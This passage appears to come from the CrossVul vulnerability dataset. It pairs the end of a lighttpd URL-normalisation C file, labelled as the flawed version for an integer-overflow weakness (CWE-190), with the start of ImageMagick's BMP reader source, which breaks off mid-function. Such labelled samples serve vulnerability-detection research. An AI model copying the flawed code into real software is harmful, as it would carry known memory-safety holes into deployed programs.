const int used = qs < 0 ? blen : qs;
int j = i;
for (; i < used; ++i, ++j) {
s[j] = s[i];
if (s[i] == '%' && s[i+1] == '2' && s[i+2] == 'F') {
s[j] = '/';
i+=2;
}
}
if (qs >= 0) {
memmove(s+j, s+qs, blen - qs);
j += blen - qs;
}
buffer_string_set_length(b, j);
return qs;
}
static int burl_normalize_2F_to_slash (buffer *b, int qs, int flags)
{
/*("%2F" must already have been uppercased during normalization)*/
const char * const s = b->ptr;
const int used = qs < 0 ? (int)buffer_string_length(b) : qs;
for (int i = 0; i < used; ++i) {
if (s[i] == '%' && s[i+1] == '2' && s[i+2] == 'F') {
return (flags & HTTP_PARSEOPT_URL_NORMALIZE_PATH_2F_DECODE)
? burl_normalize_2F_to_slash_fix(b, qs, i)
: -2; /*(flags & HTTP_PARSEOPT_URL_NORMALIZE_PATH_2F_REJECT)*/
}
}
return qs;
}
static int burl_normalize_path (buffer *b, buffer *t, int qs, int flags)
{
const unsigned char * const s = (unsigned char *)b->ptr;
const int used = (int)buffer_string_length(b);
int path_simplify = 0;
for (int i = 0, len = qs < 0 ? used : qs; i < len; ++i) {
if (s[i] == '.' && (s[i+1] != '.' || ++i)
&& (s[i+1] == '/' || s[i+1] == '?' || s[i+1] == '\0')) {
path_simplify = 1;
break;
}
do { ++i; } while (i < len && s[i] != '/');
if (s[i] == '/' && s[i+1] == '/') { /*(s[len] != '/')*/
path_simplify = 1;
break;
}
}
if (path_simplify) {
if (flags & HTTP_PARSEOPT_URL_NORMALIZE_PATH_DOTSEG_REJECT) return -2;
if (qs >= 0) {
buffer_copy_string_len(t, b->ptr+qs, used - qs);
buffer_string_set_length(b, qs);
}
buffer_path_simplify(b, b);
if (qs >= 0) {
qs = (int)buffer_string_length(b);
buffer_append_string_len(b, CONST_BUF_LEN(t));
}
}
return qs;
}
int burl_normalize (buffer *b, buffer *t, int flags)
{
int qs;
#if defined(__WIN32) || defined(__CYGWIN__)
/* Windows and Cygwin treat '\\' as '/' if '\\' is present in path;
* convert to '/' for consistency before percent-encoding
* normalization which will convert '\\' to "%5C" in the URL.
* (Clients still should not be sending '\\' unencoded in requests.) */
if (flags & HTTP_PARSEOPT_URL_NORMALIZE_PATH_BACKSLASH_TRANS) {
for (char *p = b->ptr; *p != '?' && *p != '\0'; ++p) {
if (*p == '\\') *p = '/';
}
}
#endif
qs = (flags & HTTP_PARSEOPT_URL_NORMALIZE_REQUIRED)
? burl_normalize_basic_required(b, t)
: burl_normalize_basic_unreserved(b, t);
if (-2 == qs) return -2;
if (flags & HTTP_PARSEOPT_URL_NORMALIZE_CTRLS_REJECT) {
if (burl_contains_ctrls(b)) return -2;
}
if (flags & (HTTP_PARSEOPT_URL_NORMALIZE_PATH_2F_DECODE
|HTTP_PARSEOPT_URL_NORMALIZE_PATH_2F_REJECT)) {
qs = burl_normalize_2F_to_slash(b, qs, flags);
if (-2 == qs) return -2;
}
if (flags & (HTTP_PARSEOPT_URL_NORMALIZE_PATH_DOTSEG_REMOVE
|HTTP_PARSEOPT_URL_NORMALIZE_PATH_DOTSEG_REJECT)) {
qs = burl_normalize_path(b, t, qs, flags);
if (-2 == qs) return -2;
}
if (flags & HTTP_PARSEOPT_URL_NORMALIZE_QUERY_20_PLUS) {
if (qs >= 0) burl_normalize_qs20_to_plus(b, qs);
}
return qs;
}
static void burl_append_encode_nde (buffer * const b, const char * const str, const size_t len)
{
/* percent-encodes everything except unreserved - . 0-9 A-Z _ a-z ~
* unless already percent-encoded (does not double-encode) */
/* Note: not checking for invalid UTF-8 */
char * const p = buffer_string_prepare_append(b, len*3);
unsigned int n1, n2;
int j = 0;
for (unsigned int i = 0; i < len; ++i, ++j) {
if (str[i]=='%' && li_cton(str[i+1], n1) && li_cton(str[i+2], n2)) {
const unsigned int x = (n1 << 4) | n2;
if (burl_is_unreserved((int)x)) {
p[j] = (char)x;
}
else { /* leave UTF-8, control chars, and required chars encoded */
p[j] = '%';
p[++j] = str[i+1];
p[++j] = str[i+2];
}
i+=2;
}
else if (burl_is_unreserved(str[i])) {
p[j] = str[i];
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[(str[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[str[i] & 0xF];
}
}
buffer_commit(b, j);
}
static void burl_append_encode_psnde (buffer * const b, const char * const str, const size_t len)
{
/* percent-encodes everything except unreserved - . 0-9 A-Z _ a-z ~ plus /
* unless already percent-encoded (does not double-encode) */
/* Note: not checking for invalid UTF-8 */
char * const p = buffer_string_prepare_append(b, len*3);
unsigned int n1, n2;
int j = 0;
for (unsigned int i = 0; i < len; ++i, ++j) {
if (str[i]=='%' && li_cton(str[i+1], n1) && li_cton(str[i+2], n2)) {
const unsigned int x = (n1 << 4) | n2;
if (burl_is_unreserved((int)x)) {
p[j] = (char)x;
}
else { /* leave UTF-8, control chars, and required chars encoded */
p[j] = '%';
p[++j] = str[i+1];
p[++j] = str[i+2];
}
i+=2;
}
else if (burl_is_unreserved(str[i]) || str[i] == '/') {
p[j] = str[i];
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[(str[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[str[i] & 0xF];
}
}
buffer_commit(b, j);
}
static void burl_append_encode_all (buffer * const b, const char * const str, const size_t len)
{
/* percent-encodes everything except unreserved - . 0-9 A-Z _ a-z ~
* Note: double-encodes any existing '%') */
/* Note: not checking for invalid UTF-8 */
char * const p = buffer_string_prepare_append(b, len*3);
int j = 0;
for (unsigned int i = 0; i < len; ++i, ++j) {
if (burl_is_unreserved(str[i])) {
p[j] = str[i];
}
else {
p[j] = '%';
p[++j] = hex_chars_uc[(str[i] >> 4) & 0xF];
p[++j] = hex_chars_uc[str[i] & 0xF];
}
}
buffer_commit(b, j);
}
static void burl_offset_tolower (buffer * const b, const size_t off)
{
/*(skips over all percent-encodings, including encoding of alpha chars)*/
for (char *p = b->ptr+off; p[0]; ++p) {
if (p[0] >= 'A' && p[0] <= 'Z') p[0] |= 0x20;
else if (p[0]=='%' && light_isxdigit(p[1]) && light_isxdigit(p[2]))
p+=2;
}
}
static void burl_offset_toupper (buffer * const b, const size_t off)
{
/*(skips over all percent-encodings, including encoding of alpha chars)*/
for (char *p = b->ptr+off; p[0]; ++p) {
if (p[0] >= 'a' && p[0] <= 'z') p[0] &= 0xdf;
else if (p[0]=='%' && light_isxdigit(p[1]) && light_isxdigit(p[2]))
p+=2;
}
}
void burl_append (buffer * const b, const char * const str, const size_t len, const int flags)
{
size_t off = 0;
if (0 == len) return;
if (0 == flags) {
buffer_append_string_len(b, str, len);
return;
}
if (flags & (BURL_TOUPPER|BURL_TOLOWER)) off = buffer_string_length(b);
if (flags & BURL_ENCODE_NONE) {
buffer_append_string_len(b, str, len);
}
else if (flags & BURL_ENCODE_ALL) {
burl_append_encode_all(b, str, len);
}
else if (flags & BURL_ENCODE_NDE) {
burl_append_encode_nde(b, str, len);
}
else if (flags & BURL_ENCODE_PSNDE) {
burl_append_encode_psnde(b, str, len);
}
else if (flags & BURL_ENCODE_B64U) {
const unsigned char *s = (const unsigned char *)str;
buffer_append_base64_encode_no_padding(b, s, len, BASE64_URL);
}
else if (flags & BURL_DECODE_B64U) {
buffer_append_base64_decode(b, str, len, BASE64_URL);
}
/* note: not normalizing str, which could come from arbitrary header,
* so it is possible that alpha chars are percent-encoded upper/lowercase */
if (flags & (BURL_TOLOWER|BURL_TOUPPER)) {
(flags & BURL_TOLOWER)
? burl_offset_tolower(b, off) /*(flags & BURL_TOLOWER)*/
: burl_offset_toupper(b, off); /*(flags & BURL_TOUPPER)*/
}
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_797_0 |
crossvul-cpp_data_good_5223_1 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% BBBB M M PPPP %
% B B MM MM P P %
% BBBB M M M PPPP %
% B B M M P %
% BBBB M M P %
% %
% %
% Read/Write Microsoft Windows Bitmap Image Format %
% %
% Software Design %
% Cristy %
% Glenn Randers-Pehrson %
% December 2001 %
% %
% %
% Copyright 1999-2016 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/blob.h"
#include "MagickCore/blob-private.h"
#include "MagickCore/cache.h"
#include "MagickCore/colormap-private.h"
#include "MagickCore/color-private.h"
#include "MagickCore/colormap.h"
#include "MagickCore/colorspace.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/list.h"
#include "MagickCore/log.h"
#include "MagickCore/magick.h"
#include "MagickCore/memory_.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/option.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/profile.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/static.h"
#include "MagickCore/string_.h"
#include "MagickCore/module.h"
#include "MagickCore/transform.h"
/*
Macro definitions (from Windows wingdi.h).
*/
#undef BI_JPEG
#define BI_JPEG 4
#undef BI_PNG
#define BI_PNG 5
#if !defined(MAGICKCORE_WINDOWS_SUPPORT) || defined(__MINGW32__) || defined(__MINGW64__)
#undef BI_RGB
#define BI_RGB 0
#undef BI_RLE8
#define BI_RLE8 1
#undef BI_RLE4
#define BI_RLE4 2
#undef BI_BITFIELDS
#define BI_BITFIELDS 3
#undef LCS_CALIBRATED_RBG
#define LCS_CALIBRATED_RBG 0
#undef LCS_sRGB
#define LCS_sRGB 1
#undef LCS_WINDOWS_COLOR_SPACE
#define LCS_WINDOWS_COLOR_SPACE 2
#undef PROFILE_LINKED
#define PROFILE_LINKED 3
#undef PROFILE_EMBEDDED
#define PROFILE_EMBEDDED 4
#undef LCS_GM_BUSINESS
#define LCS_GM_BUSINESS 1 /* Saturation */
#undef LCS_GM_GRAPHICS
#define LCS_GM_GRAPHICS 2 /* Relative */
#undef LCS_GM_IMAGES
#define LCS_GM_IMAGES 4 /* Perceptual */
#undef LCS_GM_ABS_COLORIMETRIC
#define LCS_GM_ABS_COLORIMETRIC 8 /* Absolute */
#endif
/*
Typedef declarations.
*/
typedef struct _BMPInfo
{
unsigned long
file_size,
ba_offset,
offset_bits,
size;
ssize_t
width,
height;
unsigned short
planes,
bits_per_pixel;
unsigned long
compression,
image_size,
x_pixels,
y_pixels,
number_colors,
red_mask,
green_mask,
blue_mask,
alpha_mask,
colors_important;
long
colorspace;
PrimaryInfo
red_primary,
green_primary,
blue_primary,
gamma_scale;
} BMPInfo;
/*
Forward declarations.
*/
static MagickBooleanType
WriteBMPImage(const ImageInfo *,Image *,ExceptionInfo *);
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DecodeImage unpacks the packed image pixels into runlength-encoded
% pixel packets.
%
% The format of the DecodeImage method is:
%
% MagickBooleanType DecodeImage(Image *image,
% const size_t compression,unsigned char *pixels)
%
% A description of each parameter follows:
%
% o image: the address of a structure of type Image.
%
% o compression: Zero means uncompressed. A value of 1 means the
% compressed pixels are runlength encoded for a 256-color bitmap.
% A value of 2 means a 16-color bitmap. A value of 3 means bitfields
% encoding.
%
% o pixels: The address of a byte (8 bits) array of pixel data created by
% the decoding process.
%
*/
static MagickBooleanType DecodeImage(Image *image,const size_t compression,
unsigned char *pixels)
{
int
count;
register ssize_t
i,
x;
register unsigned char
*p,
*q;
ssize_t
y;
unsigned char
byte;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(pixels != (unsigned char *) NULL);
(void) ResetMagickMemory(pixels,0,(size_t) image->columns*image->rows*
sizeof(*pixels));
byte=0;
x=0;
p=pixels;
q=pixels+(size_t) image->columns*image->rows;
for (y=0; y < (ssize_t) image->rows; )
{
MagickBooleanType
status;
if ((p < pixels) || (p > q))
break;
count=ReadBlobByte(image);
if (count == EOF)
break;
if (count != 0)
{
/*
Encoded mode.
*/
count=(int) MagickMin((ssize_t) count,(ssize_t) (q-p));
byte=(unsigned char) ReadBlobByte(image);
if (compression == BI_RLE8)
{
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char) byte;
}
else
{
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char)
((i & 0x01) != 0 ? (byte & 0x0f) : ((byte >> 4) & 0x0f));
}
x+=count;
}
else
{
/*
Escape mode.
*/
count=ReadBlobByte(image);
if (count == EOF)
break;
if (count == 0x01)
return(MagickTrue);
switch (count)
{
case 0x00:
{
/*
End of line.
*/
x=0;
y++;
p=pixels+y*image->columns;
break;
}
case 0x02:
{
/*
Delta mode.
*/
x+=ReadBlobByte(image);
y+=ReadBlobByte(image);
p=pixels+y*image->columns+x;
break;
}
default:
{
/*
Absolute mode.
*/
count=(int) MagickMin((ssize_t) count,(ssize_t) (q-p));
if (compression == BI_RLE8)
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char) ReadBlobByte(image);
else
for (i=0; i < (ssize_t) count; i++)
{
if ((i & 0x01) == 0)
byte=(unsigned char) ReadBlobByte(image);
*p++=(unsigned char)
((i & 0x01) != 0 ? (byte & 0x0f) : ((byte >> 4) & 0x0f));
}
x+=count;
/*
Read pad byte.
*/
if (compression == BI_RLE8)
{
if ((count & 0x01) != 0)
(void) ReadBlobByte(image);
}
else
if (((count & 0x03) == 1) || ((count & 0x03) == 2))
(void) ReadBlobByte(image);
break;
}
}
}
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
(void) ReadBlobByte(image); /* end of line */
(void) ReadBlobByte(image);
return(y < (ssize_t) image->rows ? MagickFalse : MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% E n c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% EncodeImage compresses pixels using a runlength encoded format.
%
% The format of the EncodeImage method is:
%
% static MagickBooleanType EncodeImage(Image *image,
% const size_t bytes_per_line,const unsigned char *pixels,
% unsigned char *compressed_pixels)
%
% A description of each parameter follows:
%
% o image: The image.
%
% o bytes_per_line: the number of bytes in a scanline of compressed pixels
%
% o pixels: The address of a byte (8 bits) array of pixel data created by
% the compression process.
%
% o compressed_pixels: The address of a byte (8 bits) array of compressed
% pixel data.
%
*/
static size_t EncodeImage(Image *image,const size_t bytes_per_line,
const unsigned char *pixels,unsigned char *compressed_pixels)
{
MagickBooleanType
status;
register const unsigned char
*p;
register ssize_t
i,
x;
register unsigned char
*q;
ssize_t
y;
/*
Runlength encode pixels.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(pixels != (const unsigned char *) NULL);
assert(compressed_pixels != (unsigned char *) NULL);
p=pixels;
q=compressed_pixels;
i=0;
for (y=0; y < (ssize_t) image->rows; y++)
{
for (x=0; x < (ssize_t) bytes_per_line; x+=i)
{
/*
Determine runlength.
*/
for (i=1; ((x+i) < (ssize_t) bytes_per_line); i++)
if ((i == 255) || (*(p+i) != *p))
break;
*q++=(unsigned char) i;
*q++=(*p);
p+=i;
}
/*
End of line.
*/
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
/*
End of bitmap.
*/
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x01;
return((size_t) (q-compressed_pixels));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s B M P %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsBMP() returns MagickTrue if the image format type, identified by the
% magick string, is BMP.
%
% The format of the IsBMP method is:
%
% MagickBooleanType IsBMP(const unsigned char *magick,const size_t length)
%
% A description of each parameter follows:
%
% o magick: compare image format pattern against these bytes.
%
% o length: Specifies the length of the magick string.
%
*/
static MagickBooleanType IsBMP(const unsigned char *magick,const size_t length)
{
if (length < 2)
return(MagickFalse);
if ((LocaleNCompare((char *) magick,"BA",2) == 0) ||
(LocaleNCompare((char *) magick,"BM",2) == 0) ||
(LocaleNCompare((char *) magick,"IC",2) == 0) ||
(LocaleNCompare((char *) magick,"PI",2) == 0) ||
(LocaleNCompare((char *) magick,"CI",2) == 0) ||
(LocaleNCompare((char *) magick,"CP",2) == 0))
return(MagickTrue);
return(MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e a d B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ReadBMPImage() reads a Microsoft Windows bitmap image file, Version
% 2, 3 (for Windows or NT), or 4, and returns it. It allocates the memory
% necessary for the new Image structure and returns a pointer to the new
% image.
%
% The format of the ReadBMPImage method is:
%
% image=ReadBMPImage(image_info)
%
% A description of each parameter follows:
%
% o image_info: the image info.
%
% o exception: return any errors or warnings in this structure.
%
*/
static Image *ReadBMPImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
BMPInfo
bmp_info;
Image
*image;
MagickBooleanType
status;
MagickOffsetType
offset,
start_position;
MemoryInfo
*pixel_info;
Quantum
index;
register Quantum
*q;
register ssize_t
i,
x;
register unsigned char
*p;
size_t
bit,
blue,
bytes_per_line,
green,
length,
red;
ssize_t
count,
y;
unsigned char
magick[12],
*pixels;
/*
Open image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
if (image_info->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",
image_info->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImage(image_info,exception);
status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception);
if (status == MagickFalse)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
/*
Determine if this a BMP file.
*/
(void) ResetMagickMemory(&bmp_info,0,sizeof(bmp_info));
bmp_info.ba_offset=0;
start_position=0;
count=ReadBlob(image,2,magick);
if (count != 2)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
do
{
PixelInfo
quantum_bits;
PixelPacket
shift;
size_t
profile_data,
profile_size;
/*
Verify BMP identifier.
*/
if (bmp_info.ba_offset == 0)
start_position=TellBlob(image)-2;
bmp_info.ba_offset=0;
while (LocaleNCompare((char *) magick,"BA",2) == 0)
{
bmp_info.file_size=ReadBlobLSBLong(image);
bmp_info.ba_offset=ReadBlobLSBLong(image);
bmp_info.offset_bits=ReadBlobLSBLong(image);
count=ReadBlob(image,2,magick);
if (count != 2)
break;
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule()," Magick: %c%c",
magick[0],magick[1]);
if ((count != 2) || ((LocaleNCompare((char *) magick,"BM",2) != 0) &&
(LocaleNCompare((char *) magick,"CI",2) != 0)))
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
bmp_info.file_size=ReadBlobLSBLong(image);
(void) ReadBlobLSBLong(image);
bmp_info.offset_bits=ReadBlobLSBLong(image);
bmp_info.size=ReadBlobLSBLong(image);
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule()," BMP size: %lu",
bmp_info.size);
if (bmp_info.size == 12)
{
/*
OS/2 BMP image file.
*/
(void) CopyMagickString(image->magick,"BMP2",MagickPathExtent);
bmp_info.width=(ssize_t) ((short) ReadBlobLSBShort(image));
bmp_info.height=(ssize_t) ((short) ReadBlobLSBShort(image));
bmp_info.planes=ReadBlobLSBShort(image);
bmp_info.bits_per_pixel=ReadBlobLSBShort(image);
bmp_info.x_pixels=0;
bmp_info.y_pixels=0;
bmp_info.number_colors=0;
bmp_info.compression=BI_RGB;
bmp_info.image_size=0;
bmp_info.alpha_mask=0;
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format: OS/2 Bitmap");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Geometry: %.20gx%.20g",(double) bmp_info.width,(double)
bmp_info.height);
}
}
else
{
/*
Microsoft Windows BMP image file.
*/
if (bmp_info.size < 40)
ThrowReaderException(CorruptImageError,"NonOS2HeaderSizeError");
bmp_info.width=(ssize_t) ReadBlobLSBSignedLong(image);
bmp_info.height=(ssize_t) ReadBlobLSBSignedLong(image);
bmp_info.planes=ReadBlobLSBShort(image);
bmp_info.bits_per_pixel=ReadBlobLSBShort(image);
bmp_info.compression=ReadBlobLSBLong(image);
bmp_info.image_size=ReadBlobLSBLong(image);
bmp_info.x_pixels=ReadBlobLSBLong(image);
bmp_info.y_pixels=ReadBlobLSBLong(image);
bmp_info.number_colors=ReadBlobLSBLong(image);
bmp_info.colors_important=ReadBlobLSBLong(image);
profile_data=0;
profile_size=0;
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format: MS Windows bitmap");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Geometry: %.20gx%.20g",(double) bmp_info.width,(double)
bmp_info.height);
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Bits per pixel: %.20g",(double) bmp_info.bits_per_pixel);
switch ((int) bmp_info.compression)
{
case BI_RGB:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RGB");
break;
}
case BI_RLE4:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RLE4");
break;
}
case BI_RLE8:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RLE8");
break;
}
case BI_BITFIELDS:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_BITFIELDS");
break;
}
case BI_PNG:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_PNG");
break;
}
case BI_JPEG:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_JPEG");
break;
}
default:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: UNKNOWN (%lu)",bmp_info.compression);
}
}
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number of colors: %lu",bmp_info.number_colors);
}
bmp_info.red_mask=ReadBlobLSBLong(image);
bmp_info.green_mask=ReadBlobLSBLong(image);
bmp_info.blue_mask=ReadBlobLSBLong(image);
if (bmp_info.size > 40)
{
double
gamma;
/*
Read color management information.
*/
bmp_info.alpha_mask=ReadBlobLSBLong(image);
bmp_info.colorspace=ReadBlobLSBSignedLong(image);
/*
Decode 2^30 fixed point formatted CIE primaries.
*/
# define BMP_DENOM ((double) 0x40000000)
bmp_info.red_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.red_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.red_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
gamma=bmp_info.red_primary.x+bmp_info.red_primary.y+
bmp_info.red_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.red_primary.x*=gamma;
bmp_info.red_primary.y*=gamma;
image->chromaticity.red_primary.x=bmp_info.red_primary.x;
image->chromaticity.red_primary.y=bmp_info.red_primary.y;
gamma=bmp_info.green_primary.x+bmp_info.green_primary.y+
bmp_info.green_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.green_primary.x*=gamma;
bmp_info.green_primary.y*=gamma;
image->chromaticity.green_primary.x=bmp_info.green_primary.x;
image->chromaticity.green_primary.y=bmp_info.green_primary.y;
gamma=bmp_info.blue_primary.x+bmp_info.blue_primary.y+
bmp_info.blue_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.blue_primary.x*=gamma;
bmp_info.blue_primary.y*=gamma;
image->chromaticity.blue_primary.x=bmp_info.blue_primary.x;
image->chromaticity.blue_primary.y=bmp_info.blue_primary.y;
/*
Decode 16^16 fixed point formatted gamma_scales.
*/
bmp_info.gamma_scale.x=(double) ReadBlobLSBLong(image)/0x10000;
bmp_info.gamma_scale.y=(double) ReadBlobLSBLong(image)/0x10000;
bmp_info.gamma_scale.z=(double) ReadBlobLSBLong(image)/0x10000;
/*
Compute a single gamma from the BMP 3-channel gamma.
*/
image->gamma=(bmp_info.gamma_scale.x+bmp_info.gamma_scale.y+
bmp_info.gamma_scale.z)/3.0;
}
else
(void) CopyMagickString(image->magick,"BMP3",MagickPathExtent);
if (bmp_info.size > 108)
{
size_t
intent;
/*
Read BMP Version 5 color management information.
*/
intent=ReadBlobLSBLong(image);
switch ((int) intent)
{
case LCS_GM_BUSINESS:
{
image->rendering_intent=SaturationIntent;
break;
}
case LCS_GM_GRAPHICS:
{
image->rendering_intent=RelativeIntent;
break;
}
case LCS_GM_IMAGES:
{
image->rendering_intent=PerceptualIntent;
break;
}
case LCS_GM_ABS_COLORIMETRIC:
{
image->rendering_intent=AbsoluteIntent;
break;
}
}
profile_data=ReadBlobLSBLong(image);
profile_size=ReadBlobLSBLong(image);
(void) profile_data;
(void) profile_size;
(void) ReadBlobLSBLong(image); /* Reserved byte */
}
}
if ((MagickSizeType) bmp_info.file_size > GetBlobSize(image))
(void) ThrowMagickException(exception,GetMagickModule(),CorruptImageError,
"LengthAndFilesizeDoNotMatch","`%s'",image->filename);
else
if ((MagickSizeType) bmp_info.file_size < GetBlobSize(image))
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageWarning,"LengthAndFilesizeDoNotMatch","`%s'",
image->filename);
if (bmp_info.width <= 0)
ThrowReaderException(CorruptImageError,"NegativeOrZeroImageSize");
if (bmp_info.height == 0)
ThrowReaderException(CorruptImageError,"NegativeOrZeroImageSize");
if (bmp_info.planes != 1)
ThrowReaderException(CorruptImageError,"StaticPlanesValueNotEqualToOne");
if ((bmp_info.bits_per_pixel != 1) && (bmp_info.bits_per_pixel != 4) &&
(bmp_info.bits_per_pixel != 8) && (bmp_info.bits_per_pixel != 16) &&
(bmp_info.bits_per_pixel != 24) && (bmp_info.bits_per_pixel != 32))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if (bmp_info.bits_per_pixel < 16 &&
bmp_info.number_colors > (1U << bmp_info.bits_per_pixel))
ThrowReaderException(CorruptImageError,"UnrecognizedNumberOfColors");
if ((bmp_info.compression == 1) && (bmp_info.bits_per_pixel != 8))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if ((bmp_info.compression == 2) && (bmp_info.bits_per_pixel != 4))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if ((bmp_info.compression == 3) && (bmp_info.bits_per_pixel < 16))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
switch (bmp_info.compression)
{
case BI_RGB:
image->compression=NoCompression;
break;
case BI_RLE8:
case BI_RLE4:
image->compression=RLECompression;
break;
case BI_BITFIELDS:
break;
case BI_JPEG:
ThrowReaderException(CoderError,"JPEGCompressNotSupported");
case BI_PNG:
ThrowReaderException(CoderError,"PNGCompressNotSupported");
default:
ThrowReaderException(CorruptImageError,"UnrecognizedImageCompression");
}
image->columns=(size_t) MagickAbsoluteValue(bmp_info.width);
image->rows=(size_t) MagickAbsoluteValue(bmp_info.height);
image->depth=bmp_info.bits_per_pixel <= 8 ? bmp_info.bits_per_pixel : 8;
image->alpha_trait=((bmp_info.alpha_mask != 0) &&
(bmp_info.compression == BI_BITFIELDS)) ? BlendPixelTrait :
UndefinedPixelTrait;
if (bmp_info.bits_per_pixel < 16)
{
size_t
one;
